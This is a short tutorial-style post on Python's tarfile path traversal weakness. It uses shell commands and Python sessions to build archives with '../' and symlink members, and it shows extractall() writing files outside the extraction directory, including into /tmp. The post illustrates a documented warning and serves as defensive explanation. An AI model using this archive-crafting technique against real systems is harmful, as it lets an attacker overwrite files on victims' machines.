Python's tarfile documentation leaves the following nasty warning:
Warning Never extract archives from untrusted sources without prior inspection. It is possible that files are created outside of path, e.g. members that have absolute filenames starting with "/" or filenames with two dots "..".
Let's see what that exactly means.
First to toy with the tar archive
$ touch ../test_file.txt
# `--absolute-names` ignores tar's built in file protections to prevent this from working
$ tar --append --absolute-names --file=testing.tar ../test_file.txt
$ ls -lah ../*.txt
-rw-rw-r-- 1 ec2-user ec2-user 0 Jun 30 21:34 ../test_file.txt
Now extract it with python3.6:
$ python36
Python 3.6.3 (default, Jan 4 2018, 16:40:53)
[GCC 4.8.5 20150623 (Red Hat 4.8.5-16)] on linux
>>> import tarfile
>>> with tarfile.open('testing.tar', 'r') as tar:
... tar.extractall()
...
>>>
The result:
$ ls -lah ../*.txt
-rw-rw-r-- 1 ec2-user ec2-user 0 Jun 30 21:34 ../test_file.txt
Tar file is extracted outside of it's current directory.
Another fun one along the same lines is symlink tricks:
$ touch /tmp/test_file2.txt
$ ln -s /tmp something
# Don't even need absolute names protection disabling!
$ tar --append --file=testing.tar something
$ tar --append --file=testing.tar something/test_file2.txt
$ rm /tmp/test_file2.txt
The result here?
$ python36
Python 3.6.3 (default, Jan 4 2018, 16:40:53)
[GCC 4.8.5 20150623 (Red Hat 4.8.5-16)] on linux
>>> import tarfile
>>> with tarfile.open('testing.tar', 'r') as tar:
... tar.extractall()
...
>>>
$ ls -lah /tmp/test_file2.txt
-rw-rw-r-- 1 ec2-user ec2-user 0 Jun 30 21:45 /tmp/test_file2.txt